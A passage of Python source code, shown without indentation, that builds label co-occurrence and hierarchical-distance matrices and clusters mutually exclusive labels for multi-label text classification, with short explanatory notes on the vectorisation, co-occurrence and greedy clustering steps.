vectorized_activated_clusters[[self.seed2cluster_idx[i] for i in true_pos_clusters]] = 1
self.doc_id2activated_clusters[doc_id] = vectorized_activated_clusters
f.write(str(doc_id) + '\t' + '|'.join([str(a) for a in true_pos_clusters]) + '\n')
pickle.dump(self.doc_id2activated_clusters, pickle_f)
pickle.dump(self.seed2cluster_idx, open(os.path.join(self.out_dir, 'seed2cluster_idx.p'), 'wb'))
pickle.dump(self.cluster_idx2seed, open(os.path.join(self.out_dir, 'cluster_idx2seed.p'), 'wb'))
print("Average number of activated clusters per input doc:", np.mean(temp))
print("Total number of clusters:", len(self.clusters))
def compute_class_counts(self):
cluster_class_counts = {seed: sum(counts[:-1]) for seed, counts in self.label_class_counts.items()}
cluster_class_counts = [cluster_class_counts[self.cluster_idx2seed[i]] for i in
range(len(cluster_class_counts))]
cluster_class_counts = [(self.n - c) / c for c in cluster_class_counts]
label_class_counts = {self.seed2cluster_idx[k]: v for k, v in self.label_class_counts.items()}
# the inner-cluster class counts are now stored in a dictionary keyed by the cluster's index in the
# MLCC step, rather than by its seed
pickle.dump(label_class_counts, open(os.path.join(self.out_dir, 'local_class_counts.p'), 'wb'))
pickle.dump(cluster_class_counts, open(os.path.join(self.out_dir, 'global_cluster_counts.p'), 'wb'))
class MC2CHierarchicalLabelClusterer_None(MC2CLabelClusterer_None):
def __init__(self, data_dir, max_cluster_size=10, min_cluster_size=5, max_freq_threshold=0.0, add_none=False):
super(MC2CHierarchicalLabelClusterer_None, self).__init__(data_dir, max_cluster_size=max_cluster_size,
min_cluster_size=min_cluster_size,
max_freq_threshold=max_freq_threshold,
add_none=add_none)
self.out_dir = os.path.join(self.data_dir,
'MCC/{}_{}_{}_{}_Hierarchical_Clustering'.format(self.min_cluster_size,
self.max_cluster_size,
self.max_freq_threshold,
self.add_none))
try:
self.H = pickle.load(
open(os.path.join(self.data_dir, 'MCC/H_matrix_{}l_{}d_{}.p'.format(self.m, self.n, self.add_none)),
'rb'))
self.mlb = pickle.load(open(os.path.join(self.data_dir, 'mlb_0_False.p'), 'rb'))
self.class2idx = {cls: i for i, cls in enumerate(self.mlb.classes_)}
except Exception:  # cached H matrix missing or unreadable; recompute it
self.compute_hierarchical_distances()
self.class2idx = {cls: i for i, cls in enumerate(self.mlb.classes_)}
def compute_hierarchical_distances(self):
self.H = np.zeros((self.m, self.m))
self.mlb = pickle.load(open(os.path.join(self.data_dir, 'mlb_0_False.p'), 'rb'))
all_classes = self.mlb.classes_
dc = DistanceComputer(self.hierarchical_data_dir)
print("Computing pairwise hierarchical distances between the labels...")
for i, class1 in enumerate(tqdm(all_classes)):
remaining_classes = all_classes[i + 1:]
for j, class2 in enumerate(remaining_classes):
class1_idx, class2_idx = i, j + i + 1
distance = dc.compute_distance(class1, class2)
self.H[class1_idx, class2_idx] = distance
self.H[class2_idx, class1_idx] = distance
pickle.dump(self.H, open(os.path.join(self.data_dir, 'MCC/H_matrix_{}l_{}d_{}.p'.format(self.m, self.n,
self.add_none)), 'wb'))
def generate_clusters_by_hierarchical_distance(self):
"""
Generates clusters such that the frequencies are as close as possible within the clusters, while
maintaining mutual exclusivity within each cluster
:return:
"""
unordered_freqs = self.compute_label_freqs() # dict of label: count
freqs = sorted(unordered_freqs.items(), key=operator.itemgetter(1), reverse=True) # list of tuples
# [(code, freq), ...] in descending order of frequency
max_count = max([d[1] for d in freqs]) if not self.max_freq_threshold else \
round(self.n * self.max_freq_threshold)  # maximum absolute frequency we'll allow in order for a code
# to make it into a cluster
self.loners = {d[0] for d in freqs if d[1] > max_count} # set of codes which are too high-freq for a cluster
freqs = [f for f in freqs if f[0] not in self.loners] # remove the loners from our frequency list
remaining_labels = {s[0] for s in freqs} # set of labels we can still cluster
non_overlap_dict = {l: np.where(self.C[l, :] == 0)[0].tolist() for l in
remaining_labels} # a dictionary for each
# label, {label: [list of labels which the key label never co-occurs with], ...}
non_overlap_dict[self.m] = [f[0] for f in freqs] # None label co-occurs with nothing
print("Generating hierarchical clusters...")
for entry in tqdm(freqs): # iterate over every label we didn't discard due to high-freq
seed = entry[0] # since we're starting with the most high-freq labels, whichever label we're on is the seed
labels = non_overlap_dict[seed] # labels which do not overlap with our chosen seed
if seed not in remaining_labels: # if we already assigned this label to a cluster, it can't be a seed
continue
else:
sorted_closeby_labels = np.argsort(self.H[seed, :])
labels = [l for l in sorted_closeby_labels if l in labels and l in remaining_labels] # gives us
# eligible labels in ascending distance from our seed
cluster = []
for lab in labels: # iterate over eligible labels...
non_overlaps = set(non_overlap_dict[lab]) # get the set of labels which current potential/eligible
# label doesn't co-occur with...
if set(cluster).issubset(non_overlaps): # make sure that none of the labels currently in the
# cluster co-occur with this label
cluster.append(lab)
if len(cluster) == self.max_cluster_size - 1: # if we reached the maximum cluster size, we're done
break
cluster = cluster + [self.m]
# cluster = [self.m] + cluster
self.clusters[seed] = [seed] + cluster # add to dict which keeps track of clusters by their seeds
remaining_labels -= set(self.clusters[seed]) # remove these clustered labels from our set of remaining
for l in self.loners: # make sure to add the loners which we discarded due to high freq; they simply form
# their own cluster
# self.clusters[l] = [self.m, l]
self.clusters[l] = [l, self.m]
try:
temp = {seed: list(cluster) for seed, cluster in self.clusters.items()}  # dict has no .deepcopy(); copy each cluster list
to_remove = set()
# Find the leftover, low-frequency codes which ended up alone in their own cluster and merge them into
# another compatible cluster. This may cause max_cluster_size to be exceeded by 1 or 2, but that is
# preferable to leaving them on their own if we want to employ an LDAM loss function. Sometimes no
# compatible cluster exists and certain labels would be left without one, hence the try/except.
for seed, cluster in self.clusters.items():
if len(cluster) < self.min_cluster_size and seed not in self.loners:
for label in cluster:
non_overlaps = set(non_overlap_dict[label])
for seed2, cluster2 in self.clusters.items():
# if label == seed2 or seed2 in self.loners:
if seed == seed2 or seed2 in self.loners:
continue
else:
if set(cluster2).issubset(non_overlaps):
temp[seed2].append(label)
to_remove.add(seed)
break
for r in to_remove:
del temp[r]
assert len(self.mlb.classes_)+1 == len({l for label_list in self.clusters.values() for l in label_list}), \
"The following labels are not in clusters: {}".format(set(self.mlb.classes_) -
set([self.mlb.classes_[l] for label_list in
self.clusters.values() for l in label_list]))
self.clusters = temp
except Exception:
pass  # merging occasionally leaves a label without a cluster; keep the unmerged clusters
assert len(self.mlb.classes_)+1 == len({l for label_list in self.clusters.values() for l in label_list}), \
"The following labels are not in clusters: {}".format(set(self.mlb.classes_) -
set([self.mlb.classes_[l] for label_list in
self.clusters.values() for l in label_list]))
def split_data_by_clusters(self, data_type):
"""
Splits data such that each cluster (a separate MCC task) has its own dataset
:return:
"""
self.data_type = data_type
self.load_data(data_type)
if data_type == 'train':
self.generate_clusters_by_hierarchical_distance()
data_type = self.train_data
elif data_type == 'dev':
data_type = self.dev_data
mlb = pickle.load(open(os.path.join(self.data_dir, 'mlb_0_False.p'), 'rb'))
mlb.classes_ = np.append(mlb.classes_, np.array(['None']))
data_dict = defaultdict(list)
self.make_cluster_idx2general_idx_dict()
for item in data_type:
doc_id = item[0]
text = item[1]
label_matrix = item[2] # e.g. if we have only 10 labels total [0, 1, 0, 0, 0, 1, 1, 0, 0, 0]
labels = np.nonzero(label_matrix)[0].tolist() # [1, 5, 6]
for seed in self.clusters.keys(): # for cluster in clusters
label_matrix = np.zeros(len(self.clusters[seed])) # generate an empty matrix of cluster size to add
# binary labels to for MCC
filtered_labels = set(labels) & set(self.clusters[seed]) # determine which labels of this example are
# relevant to the currently activated cluster
if not filtered_labels: # if there is no true label in the activated cluster, make it the 'None' label
filtered_labels = {self.m}
new_cluster_specific_label_idx = [self.overall_idx2cluster_idx[seed][l] for l in filtered_labels]
# we have now mapped the positive labels from the entire label space to those which are positive
# within the specific cluster we're focusing on; here, most of the pos labels will be at the -1
# index, since we made 'None' the last index everywhere (in each cluster, in mlb.classes_...)
label_matrix[new_cluster_specific_label_idx] = 1
if data_type == self.train_data:
assert np.sum(label_matrix) == 1, "There is more than one active label in the cluster."
data_dict[seed].append((doc_id, text, label_matrix))
"""
Okay anything from here down I gotta redo; I need to make sure that when 'None' is the true label in a
cluster, that the cluster activator has a 0 for that cluster.
"""
for seed, data in data_dict.items():
# for cluster, [(doc_id, text, label_matrix_for_that_cluster), (doc_id, text, label_matrix_for_that_cluster)]
if not os.path.exists(os.path.join(self.out_dir, str(seed))):
os.mkdir(os.path.join(self.out_dir, str(seed)))
with open(os.path.join(self.out_dir, str(seed), self.data_type + '.tsv'), 'w') as f:
file_name = os.path.join(str(seed), '{}_doc_id2gold.p'.format(self.data_type))
temp = dict()
if self.data_type == 'train':
all_labs = np.array([e[-1] for e in data])
self.label_class_counts[seed] = np.sum(all_labs, axis=0).tolist()
# print(seed, all_labs_counts)
for entry in data: # iterate over the different (doc_id, text, label_matrix_for_that_cluster)
if entry[-1][-1] != 1: # make sure 'None' isn't the pos label
self.doc_id2activated_clusters[entry[0]].add(seed)
temp[entry[0]] = entry[2] # {doc_id: label_matrix_for_that_cluster}
lab = self.cluster_idx2overall_idx[seed][np.nonzero(entry[2])[0][0]]
lab = mlb.classes_[lab]
f.write(str(entry[0]) + '\t' + str(entry[1]) + '\t' + str(lab) + '\n')
pickle.dump(temp, open(os.path.join(self.out_dir, file_name), 'wb'))
pickle.dump(self.overall_idx2cluster_idx[seed],
open(os.path.join(self.out_dir, str(seed), 'overall_idx2cluster_idx.p'), 'wb'))
pickle.dump(self.cluster_idx2overall_idx[seed],
open(os.path.join(self.out_dir, str(seed), 'cluster_idx2overall_idx.p'), 'wb'))
class MC2CHierarchicalLabelClusterer(MC2CLabelClusterer):
def __init__(self, data_dir, max_cluster_size=10, min_cluster_size=5, max_freq_threshold=0.0, add_none=False):
super(MC2CHierarchicalLabelClusterer, self).__init__(data_dir, max_cluster_size=max_cluster_size,
min_cluster_size=min_cluster_size,
max_freq_threshold=max_freq_threshold,
add_none=add_none)
self.out_dir = os.path.join(self.data_dir,
'MCC/{}_{}_{}_{}_Hierarchical_Clustering'.format(self.min_cluster_size,
self.max_cluster_size,
self.max_freq_threshold,
self.add_none))
try:
self.H = pickle.load(
open(os.path.join(self.data_dir, 'MCC/H_matrix_{}l_{}d_{}.p'.format(self.m, self.n, self.add_none)),
'rb'))
self.mlb = pickle.load(open(os.path.join(self.data_dir, 'mlb_0_False.p'), 'rb'))
self.class2idx = {cls: i for i, cls in enumerate(self.mlb.classes_)}
except Exception:  # cached H matrix missing or unreadable; recompute it
self.compute_hierarchical_distances()
self.class2idx = {cls: i for i, cls in enumerate(self.mlb.classes_)}
def compute_hierarchical_distances(self):
self.H = np.zeros((self.m, self.m))
self.mlb = pickle.load(open(os.path.join(self.data_dir, 'mlb_0_False.p'), 'rb'))
all_classes = self.mlb.classes_
dc = DistanceComputer(self.hierarchical_data_dir)
print("Computing pairwise hierarchical distances between the labels...")
for i, class1 in enumerate(tqdm(all_classes)):
remaining_classes = all_classes[i + 1:]
for j, class2 in enumerate(remaining_classes):
class1_idx, class2_idx = i, j + i + 1
distance = dc.compute_distance(class1, class2)
self.H[class1_idx, class2_idx] = distance
self.H[class2_idx, class1_idx] = distance
pickle.dump(self.H, open(os.path.join(self.data_dir, 'MCC/H_matrix_{}l_{}d_{}.p'.format(self.m, self.n,
self.add_none)), 'wb'))
def generate_clusters_by_hierarchical_distance(self):
"""
Generates clusters such that the labels are as hierarchically close as possible within the clusters,
while maintaining mutual exclusivity within each cluster
:return:
"""
unordered_freqs = self.compute_label_freqs() # dict of label: count
freqs = sorted(unordered_freqs.items(), key=operator.itemgetter(1), reverse=True) # list of tuples
# [(code, freq), ...] in descending order of frequency
max_count = max([d[1] for d in freqs]) if not self.max_freq_threshold else \
round(self.n * self.max_freq_threshold)  # maximum absolute frequency we'll allow in order for a code
# to make it into a cluster
self.loners = {d[0] for d in freqs if d[1] > max_count}  # set of codes which are too high-freq for a cluster
freqs = [f for f in freqs if f[0] not in self.loners] # remove the loners from our frequency list
remaining_labels = {s[0] for s in freqs} # set of labels we can still cluster
non_overlap_dict = {l: np.where(self.C[l, :] == 0)[0].tolist() for l in
remaining_labels} # a dictionary for each
# label, {label: [list of labels which the key label never co-occurs with], ...}
print("Generating hierarchical clusters...")
for entry in tqdm(freqs): # iterate over every label we didn't discard due to high-freq
seed = entry[0] # since we're starting with the most high-freq labels, whichever label we're on is the seed
labels = non_overlap_dict[seed] # labels which do not overlap with our chosen seed
if seed not in remaining_labels: # if we already assigned this label to a cluster, it can't be a seed
continue
else:
sorted_closeby_labels = np.argsort(self.H[seed, :])
labels = [l for l in sorted_closeby_labels if l in labels and l in remaining_labels] # gives us
# eligible labels in ascending distance from our seed
# print(self.mlb.classes_[seed])
# print([self.mlb.classes_[l] for l in labels[:15]])
cluster = []
for lab in labels: # iterate over eligible labels...
non_overlaps = set(non_overlap_dict[lab]) # get the set of labels which current potential/eligible
# label doesn't co-occur with...
if set(cluster).issubset(non_overlaps): # make sure that none of the labels currently in the
# cluster co-occur with this label
cluster.append(lab)
if len(cluster) == self.max_cluster_size - 1: # if we reached the maximum cluster size, we're done
break
self.clusters[seed] = cluster + [seed] # add to dict which keeps track of clusters by their seeds
remaining_labels -= set(self.clusters[seed]) # remove these clustered labels from our set of remaining
for l in self.loners: # make sure to add the loners which we discarded due to high freq; they simply form
# their own cluster
self.clusters[l] = [l]
try:
temp = {seed: list(cluster) for seed, cluster in self.clusters.items()}  # dict has no .deepcopy(); copy each cluster list
to_remove = set()
# Find the leftover, low-frequency codes which ended up alone in their own cluster and merge them into
# another compatible cluster. This may cause max_cluster_size to be exceeded by 1 or 2, but that is
# preferable to leaving them on their own if we want to employ an LDAM loss function. Sometimes no
# compatible cluster exists and certain labels would be left without one, hence the try/except.
for seed, cluster in self.clusters.items():
if len(cluster) < self.min_cluster_size and seed not in self.loners:
for label in cluster:
non_overlaps = set(non_overlap_dict[label])
for seed2, cluster2 in self.clusters.items():
# if label == seed2 or seed2 in self.loners:
if seed == seed2 or seed2 in self.loners:
continue
else:
if set(cluster2).issubset(non_overlaps):
temp[seed2].append(label)
to_remove.add(seed)
break
for r in to_remove:
del temp[r]
assert len(self.mlb.classes_) == len([l for label_list in self.clusters.values() for l in label_list]), \
"The following labels are not in clusters: {}".format(set(self.mlb.classes_) -
set([self.mlb.classes_[l] for label_list in
self.clusters.values() for l in label_list]))
self.clusters = temp
except Exception:
pass  # merging occasionally leaves a label without a cluster; keep the unmerged clusters
assert len(self.mlb.classes_) == len([l for label_list in self.clusters.values() for l in label_list]), \
"The following labels are not in clusters: {}".format(set(self.mlb.classes_) -
set([self.mlb.classes_[l] for label_list in
self.clusters.values() for l in label_list]))
def split_data_by_clusters(self, data_type):
"""
Splits data such that each cluster (a separate MCC task) has its own dataset
:return:
"""
self.data_type = data_type
self.load_data(data_type)
if data_type == 'train':
self.generate_clusters_by_hierarchical_distance()
data_type = self.train_data
elif data_type == 'dev':
data_type = self.dev_data
mlb = pickle.load(open(os.path.join(self.data_dir, 'mlb_0_False.p'), 'rb'))
data_dict = defaultdict(list)
self.make_cluster_idx2general_idx_dict()
for item in data_type:
doc_id = item[0]
text = item[1]
label_matrix = item[2]
labels = np.nonzero(label_matrix)[0].tolist()
activated_clusters = [seed for seed, cluster in self.clusters.items() if bool(set(labels) & set(cluster))]
if self.data_type == 'train':
assert len(labels) == len(
activated_clusters), "Sorry, mismatch with labels {} and activated clusters {}, " \
"document {}".format('|'.join([str(l) for l in labels]),
'|'.join([str(a) for a in
activated_clusters]),
doc_id)
for seed in activated_clusters:
label_matrix = np.zeros(len(self.clusters[seed])) # generate an empty matrix of cluster size to add
# binary labels to for MLCC using BR
filtered_labels = set(labels) & set(self.clusters[seed]) # determine which labels of this example are
# relevant to the currently activated cluster
new_cluster_specific_label_idx = [self.overall_idx2cluster_idx[seed][l] for l in filtered_labels]
label_matrix[new_cluster_specific_label_idx] = 1
# if self.data_type == 'train':
# print(label_matrix)
data_dict[seed].append((doc_id, text, label_matrix))
for seed, data in data_dict.items():
if not os.path.exists(os.path.join(self.out_dir, str(seed))):
os.mkdir(os.path.join(self.out_dir, str(seed)))
with open(os.path.join(self.out_dir, str(seed), self.data_type + '.tsv'), 'w') as f:
file_name = os.path.join(str(seed), '{}_doc_id2gold.p'.format(self.data_type))
temp = dict()
if self.data_type == 'train':
all_labs = np.array([e[-1] for e in data])
self.label_class_counts[seed] = np.sum(all_labs, axis=0).tolist()
for entry in data:
# if self.data_type == 'train':
# lab_idx = np.nonzero(entry[-1])[0].item()
# self.label_class_counts[seed][lab_idx] += 1 # for class counts
self.doc_id2activated_clusters[entry[0]].add(seed)
temp[entry[0]] = entry[2]
lab = self.cluster_idx2overall_idx[seed][np.nonzero(entry[2])[0][0]]
lab = mlb.classes_[lab]
f.write(str(entry[0]) + '\t' + entry[1] + '\t' + lab + '\n')
pickle.dump(temp, open(os.path.join(self.out_dir, file_name), 'wb'))
pickle.dump(self.overall_idx2cluster_idx[seed],
open(os.path.join(self.out_dir, str(seed), 'overall_idx2cluster_idx.p'), 'wb'))
pickle.dump(self.cluster_idx2overall_idx[seed],
open(os.path.join(self.out_dir, str(seed), 'cluster_idx2overall_idx.p'), 'wb'))
def split_into_cluster_prediction_data(self):
"""
Creates data splits for the MLCC task
:return:
"""
self.seed2cluster_idx = {c: i for i, c in enumerate(self.clusters.keys())}
self.cluster_idx2seed = {i: c for i, c in enumerate(self.clusters.keys())}
temp = []
with open(os.path.join(self.out_dir, 'doc_ids2clusters.p'), 'wb') as pickle_f, \
open(os.path.join(self.out_dir, 'doc_ids2clusters.tsv'), 'w') as f:
for doc_id in self.train_ids:
activated_clusters = self.doc_id2activated_clusters[doc_id]
temp.append(len(activated_clusters))
vectorized_activated_clusters = np.zeros(len(self.clusters))
vectorized_activated_clusters[[self.seed2cluster_idx[i] for i in activated_clusters]] = 1
self.doc_id2activated_clusters[doc_id] = vectorized_activated_clusters
f.write(doc_id + '\t' + '|'.join([str(a) for a in activated_clusters]) + '\n')
for doc_id in self.dev_ids:
activated_clusters = self.doc_id2activated_clusters[doc_id]
temp.append(len(activated_clusters))
vectorized_activated_clusters = np.zeros(len(self.clusters))
vectorized_activated_clusters[[self.seed2cluster_idx[i] for i in activated_clusters]] = 1
self.doc_id2activated_clusters[doc_id] = vectorized_activated_clusters
f.write(str(doc_id) + '\t' + '|'.join([str(a) for a in activated_clusters]) + '\n')
pickle.dump(self.doc_id2activated_clusters, pickle_f)
pickle.dump(self.seed2cluster_idx, open(os.path.join(self.out_dir, 'seed2cluster_idx.p'), 'wb'))
pickle.dump(self.cluster_idx2seed, open(os.path.join(self.out_dir, 'cluster_idx2seed.p'), 'wb'))
print("Average number of activated clusters per input doc:", np.mean(temp))
print("Total number of clusters:", len(self.clusters))
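The vectorization step above turns a document's set of activated cluster seeds into a fixed-length multi-hot target for the MLCC stage. A minimal standalone sketch of that step, with made-up seeds and index mapping:

```python
import numpy as np

# Hypothetical setup: three clusters identified by their seed labels,
# mapped to positions in the cluster-prediction target vector.
seed2cluster_idx = {4: 0, 11: 1, 23: 2}
activated = {11, 23}  # clusters relevant to one document

# Multi-hot encoding, mirroring vectorized_activated_clusters above.
vec = np.zeros(len(seed2cluster_idx))
vec[[seed2cluster_idx[s] for s in activated]] = 1
```

The same vector length (the total number of clusters) is used for every document, so these vectors can be stacked directly into a training matrix.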
def main(self):
if not os.path.exists(self.out_dir):
os.mkdir(self.out_dir)
self.split_data_by_clusters('train')
self.split_data_by_clusters('dev')
self.split_into_cluster_prediction_data()
self.generate_preliminary_exp_data()
self.compute_class_counts()
pickle.dump(self.clusters, open(os.path.join(self.out_dir, 'clusters.p'), 'wb'))
else:
self.clusters = pickle.load(open(os.path.join(self.out_dir, 'clusters.p'), 'rb'))
class MC2CFuzzyLabelClusterer():
def __init__(self, data_dir, max_cluster_size=10, min_cluster_size=5, max_freq_threshold=0.0, add_none=False):
self.data_dir = data_dir
self.data_type = ''
self.load_data('train')
self.load_data('dev')
self.add_none = add_none
self.train_ids = [d[0] for d in self.train_data]
self.dev_ids = [d[0] for d in self.dev_data]
self.max_freq_threshold = max_freq_threshold
self.m = len(self.train_data[0][2]) # num labels
self.n = len(self.train_data) # num docs
self.E = np.zeros((self.n, self.m))
self.C = np.zeros((self.m, self.m))
self.create_E_matrix()
self.power_dict = dict() # per-label clustering power dictionary
self.clusters = defaultdict(set) # dict of {seed: {label1, ..., labeln},...}
self.loners = set() # those labels which get their own single binary classifier
self.doc_id2activated_clusters = defaultdict(set) # dictionary mapping doc_id --> relevant clusters
self.max_cluster_size = max_cluster_size
self.min_cluster_size = min_cluster_size
self.n_c = (self.m // (self.max_cluster_size - 1)) + 1
self.cluster_class_counts = dict()
self.label_class_counts = dict()
self.overall_idx2cluster_idx = defaultdict(dict)
self.cluster_idx2overall_idx = defaultdict(dict)
if not os.path.exists(os.path.join(self.data_dir, 'MCC/')):
os.mkdir(os.path.join(self.data_dir, 'MCC/'))
try:
self.C = pickle.load(
open(os.path.join(self.data_dir, 'MCC/C_matrix_{}l_{}d_{}.p'.format(self.m, self.n, self.add_none)),
'rb'))
except (FileNotFoundError, EOFError):  # no cached C matrix yet; build and pickle it
self.compute_C_matrix()
self.delta = self.n_c / self.m
self.epsilon = 0.001
def load_data(self, data_type):
self.train_data = pickle.load(open(os.path.join(self.data_dir, 'train_0_False.p'), 'rb'))  # the former .format(data_type) was a no-op: the template has no placeholder
self.dev_data = pickle.load(open(os.path.join(self.data_dir, 'dev_0_False.p'), 'rb'))
def create_E_matrix(self):
try:
for i, (doc_id, text, labels, ranks) in enumerate(self.train_data):
# labels = np.append(labels, np.array([0]))
self.E[i, :] = labels
except ValueError:  # entries without a ranks field unpack to 3-tuples
for i, (doc_id, text, labels) in enumerate(self.train_data):
# labels = np.append(labels, np.array([0]))
self.E[i, :] = labels
def compute_C_matrix(self):
"""
Creates a co-occurrence matrix from self.E
:return:
"""
for i in trange(self.m):
for j in range(self.n):
co_occurrences = set(np.nonzero(self.E[j, :])[0])
if i not in co_occurrences:
continue
else:
for l in co_occurrences:
self.C[i, l] = 1
pickle.dump(self.C, open(os.path.join(self.data_dir, 'MCC/C_matrix_{}l_{}d_{}.p'.format(self.m, self.n,
self.add_none)), 'wb'))
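The nested loops in compute_C_matrix build a binary label co-occurrence matrix: C[i, l] is 1 iff labels i and l appear together in at least one document. Since E is a binary documents-by-labels matrix, the same result follows from a single matrix product, shown here on a small made-up E:

```python
import numpy as np

# Toy example-by-label matrix E (3 docs, 4 labels); hypothetical data.
E = np.array([[1, 1, 0, 0],
              [0, 1, 1, 0],
              [0, 0, 0, 1]])

# (E.T @ E)[i, l] counts the documents in which labels i and l are both
# active, so thresholding at zero reproduces the nested-loop construction.
C = (E.T @ E > 0).astype(float)
```

For large label sets this avoids the O(m * n) Python-level loop entirely; note the diagonal is 1 for every label that occurs at least once, matching the loop's behavior.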
def generate_clusters_by_freq(self):
"""
Generates clusters such that the frequencies are as close as possible within the clusters, while maintaining
mutual exclusivity within each cluster
:return:
"""
unordered_freqs = self.compute_label_freqs() # dict of label: count
freqs = sorted(unordered_freqs.items(), key=operator.itemgetter(1), reverse=True) # list of tuples
# [(code, freq), ...] in descending order of frequency
max_count = max([d[1] for d in freqs]) if not self.max_freq_threshold else \
round(self.n * self.max_freq_threshold) # maximum absolute frequency we'll allow in order for a code
# to make it in to a cluster
self.loners = {d[0] for d in freqs if d[1] > max_count} # set of codes which are too high-freq for a cluster
freqs = [f for f in freqs if f[0] not in self.loners] # remove the loners from our frequency list
remaining_labels = {s[0] for s in freqs} # set of labels we can still cluster
non_overlap_dict = {l: np.where(self.C[l, :] == 0)[0].tolist() for l in
remaining_labels} # a dictionary for each
# label, {label: [list of labels which the key label never co-occurs with], ...}
for entry in freqs: # iterate over every label we didn't discard due to high-freq
seed = entry[0] # since we're starting with the most high-freq labels, whichever label we're on is the seed
labels = non_overlap_dict[seed] # labels which do not overlap with our chosen seed
if seed not in remaining_labels: # if we already assigned this label to a cluster, it can't be a seed
continue
else:
labels = [l[0] for l in freqs if l[0] in labels and l[0] in remaining_labels] # gives us the eligible
# labels in descending freq
cluster = []
for lab in labels: # iterate over eligible labels...
non_overlaps = set(non_overlap_dict[lab]) # get the set of labels which current potential/eligible
# label doesn't co-occur with...
if set(cluster).issubset(non_overlaps): # make sure that none of the labels currently in the
# cluster co-occur with this label
cluster.append(lab)
if len(cluster) == self.max_cluster_size - 1: # if we reached the maximum cluster size, we're done
break
self.clusters[seed] = cluster + [seed] # add to dict which keeps track of clusters by their seeds
remaining_labels -= set(self.clusters[seed]) # remove these clustered labels from our set of remaining
for l in self.loners: # make sure to add the loners which we discarded due to high freq; they simply form
# their own cluster
self.clusters[l] = [l]
to_remove = set()
# now, we want to find those left over, low-frequency codes which ended up alone in their own cluster; the idea
# is to find a cluster we could add them to, which may cause the max_cluster_size to be exceeded by 1 or 2,
# but I feel it's better than leaving them on their own, if we want to employ an LDAM loss function
for seed, cluster in self.clusters.items():
if len(cluster) < self.min_cluster_size and seed not in self.loners:
for label in cluster:
non_overlaps = set(non_overlap_dict[label])
for seed2, cluster2 in self.clusters.items():
if label == seed2 or seed2 in self.loners:
continue
else:
if set(cluster2).issubset(non_overlaps):
self.clusters[seed2].append(label)
to_remove.add(seed)
break
for r in to_remove:
del self.clusters[r]
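The greedy pass in generate_clusters_by_freq can be seen in miniature on a toy co-occurrence matrix. The sketch below (hypothetical labels, frequencies, and C) keeps only the core invariant: a label joins a cluster only if it never co-occurs with any current member. The max_cluster_size cutoff and loner handling are omitted for brevity.

```python
import numpy as np

# Hypothetical 4-label co-occurrence matrix: label 0 co-occurs with 1,
# label 1 with 2, and label 2 with 3; all other pairs are exclusive.
C = np.array([[1, 1, 0, 0],
              [1, 1, 1, 0],
              [0, 1, 1, 1],
              [0, 0, 1, 1]], dtype=float)

non_overlap = {l: set(np.where(C[l] == 0)[0]) for l in range(4)}
freq_order = [1, 2, 0, 3]  # labels in descending frequency (made up)
remaining, clusters = set(range(4)), {}

for seed in freq_order:  # greedy pass, mirroring generate_clusters_by_freq
    if seed not in remaining:
        continue  # already clustered, so it cannot seed a new cluster
    cluster = []
    for lab in (l for l in freq_order if l in non_overlap[seed] and l in remaining):
        if set(cluster).issubset(non_overlap[lab]):  # lab conflicts with no member
            cluster.append(lab)
    clusters[seed] = cluster + [seed]
    remaining -= set(clusters[seed])
```

Here label 1 seeds a cluster with label 3, and label 2 seeds one with label 0; every label ends up in exactly one cluster.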
def compute_label_freqs(self):
label_freq_dict = {i: np.sum(self.E[:, i]) for i in range(self.m)}
return label_freq_dict
def make_cluster_idx2general_idx_dict(self):
"""
Creates a dictionary which maps between the global index of a label and the local (inner-cluster-specific)
index. The seed is what identifies a cluster, and this gives us a way to map between what labels are at
what indices within a cluster
:return:
"""
for seed, cluster in self.clusters.items():
for i, c in enumerate(cluster):
self.overall_idx2cluster_idx[seed][c] = i # {Seed: {mlb label idx: inner-cluster idx,...},...}
self.cluster_idx2overall_idx[seed][i] = c # {Seed: {inner-cluster idx: mlb label idx,...},...}
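The two dictionaries built above are simple inverse index maps per cluster. A self-contained sketch with hypothetical clusters shows the round trip between global (mlb) indices and local in-cluster positions:

```python
# Hypothetical clusters keyed by seed; values are global (mlb) label indices.
clusters = {7: [2, 5, 7], 9: [0, 9]}

overall2cluster, cluster2overall = {}, {}
for seed, cluster in clusters.items():  # same loop as make_cluster_idx2general_idx_dict
    overall2cluster[seed] = {c: i for i, c in enumerate(cluster)}  # global -> local
    cluster2overall[seed] = {i: c for i, c in enumerate(cluster)}  # local -> global
```

Because each map is built from the same enumeration, composing them in either order is the identity, which is what lets split_data_by_clusters translate labels into per-cluster targets and back.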
def split_data_by_clusters(self, data_type):
"""
Splits data such that each cluster (a separate MCC task) has its own dataset
:return:
"""
self.data_type = data_type
self.load_data(data_type)
if data_type == 'train':
self.generate_clusters_by_freq()
data_type = self.train_data
elif data_type == 'dev':
data_type = self.dev_data
out_dir = os.path.join(self.data_dir, 'MCC/{}_{}_{}_{}'.format(self.min_cluster_size, self.max_cluster_size,
self.max_freq_threshold, self.add_none))
if not os.path.exists(out_dir):
os.mkdir(out_dir)
mlb = pickle.load(open(os.path.join(self.data_dir, 'mlb_0_False.p'), 'rb'))
data_dict = defaultdict(list)
self.make_cluster_idx2general_idx_dict()
for item in data_type:
doc_id = item[0]
text = item[1]
label_matrix = item[2]
labels = np.nonzero(label_matrix)[0].tolist()
activated_clusters = [seed for seed, cluster in self.clusters.items() if bool(set(labels) & set(cluster))]
if self.data_type == 'train':
assert len(labels) == len(
activated_clusters), "Sorry, mismatch with labels {} and activated clusters {}, " \
"document {}".format('|'.join([str(l) for l in labels]),
'|'.join([str(a) for a in
activated_clusters]),
doc_id)
for seed in activated_clusters:
label_matrix = np.zeros(len(self.clusters[seed])) # generate an empty matrix of cluster size to add
# binary labels to for MLCC using BR
filtered_labels = set(labels) & set(self.clusters[seed]) # determine which labels of this example are
# relevant to the currently activated cluster
new_cluster_specific_label_idx = [self.overall_idx2cluster_idx[seed][l] for l in filtered_labels]
label_matrix[new_cluster_specific_label_idx] = 1
# if self.data_type == 'train':
# print(label_matrix)
data_dict[seed].append((doc_id, text, label_matrix))
for seed, data in data_dict.items():
if not os.path.exists(os.path.join(out_dir, str(seed))):
os.mkdir(os.path.join(out_dir, str(seed)))
with open(os.path.join(out_dir, str(seed), self.data_type + '.tsv'), 'w') as f:
file_name = os.path.join(str(seed), '{}_doc_id2gold.p'.format(self.data_type))
temp = dict()
if self.data_type == 'train':
all_labs = np.array([e[-1] for e in data])
self.label_class_counts[seed] = np.sum(all_labs, axis=0).tolist()
for entry in data:
# if self.data_type == 'train':
# lab_idx = np.nonzero(entry[-1])[0].item()
# self.label_class_counts[seed][lab_idx] += 1 # for class counts
